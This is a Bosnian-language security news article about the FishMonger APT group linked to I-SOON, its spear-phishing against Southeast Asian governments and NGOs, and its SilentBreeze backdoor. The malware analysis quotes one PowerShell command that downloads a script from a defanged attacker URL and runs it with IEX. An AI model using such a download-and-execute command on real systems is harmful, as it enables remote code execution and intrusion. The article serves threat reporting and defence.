Nedavne istrage kibernetičke sigurnosti otkrile su sofisticiranog hakera nazvanog “FishMonger” koji djeluje pod okriljem I-SOON, kineske kompanije koja je navodno povezana s hakerskim operacijama koje sponzoriše država.
Ova grupa za naprednu trajnu prijetnju (APT) sistematski cilja na vladine institucije i nevladine organizacije širom jugoistočne Azije i dijelova Evrope od najmanje 2021.
Napadi pokazuju visok nivo sofisticiranosti, s pažljivo osmišljenim phishing kampanjama i prilagođenim malicioznim softverom dizajniranim da eksfiltriraju osjetljive diplomatske informacije i informacije vezane za politiku iz ciljanih organizacija.
Početna analiza sugerira da su operacije FishMongera u skladu sa kineskim strateškim interesima, posebno fokusirajući se na subjekte uključene u teritorijalne sporove u Južnom kineskom moru i međunarodne grupe za zagovaranje ljudskih prava koje prate aktivnosti u regiji.
Grupa održava uporan pristup ugroženim mrežama tokom dužeg perioda, često ostaje neotkriven mjesecima dok prikuplja kredencijale i osjetljive dokumente.
ESET-ovi istraživači su identifikovali karakteristične obrasce u lancu napada FishMonger-a, uključujući upotrebu ubrizgavanja šablona u dokumente Microsoft Office-a i prilagođeni backdoor pod nazivom “SilentBreeze” koji uspostavlja komandne i kontrolne veze putem šifrovanih kanala.
Ovaj APT koristi sofisticirane tehnike kontradetekcije, redovno modifikujući svoj skup alata kako bi izbjegao sigurnosna rješenja.
Inicijalna infekcija obično počinje s spear-phishing emailovima koji sadrže maliciozne dokumente prilagođene organizaciji žrtve.
Kada se otvore, ovi dokumenti iskorištavaju ranjivosti ili koriste društveni inženjering za izvođenje procesa infekcije u više faza.
.webp)
E-poruka za krađu identiteta usmjerena na diplomatsko predstavništvo jugoistočne Azije s dokumentom koji navodno sadrži informacije o regionalnoj sigurnosti.
Analiza SilentBreeze Backdoor-a
SilentBreeze backdoor koristi složeni algoritam šifrovanja da prikrije svoj komandni i kontrolni promet.
Nakon izvršenja, stvara postojanost kroz zakazani zadatak koji izvršava sljedeću PowerShell naredbu :-
$wc = New-Object System.Net.WebClient;
$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36");
$wc.DownloadString("hxxps://cdn-storage[.]cloud-service[.]site/updates.php") | IEXOva komanda preuzima i izvršava dodatne korisne podatke iz napadačeve infrastrukture.
.webp)
Maliciozni softver zatim uspostavlja komunikaciju sa komandnim serverima, koji prikazuje obrazac mrežnog prometa koji je karakterističan za SilentBreeze infekcije.
Infrastruktura grupe se u velikoj mjeri oslanja na kompromitovane web stranice trećih strana koje služe kao proksi za maskiranje pravih komandnih servera, čineći napore pripisivanja i uklanjanja posebno izazovnim za organizacije koje štite i istraživače kibernetičke sigurnosti koji prate njihove aktivnosti.
Izvor: CyberSecurityNews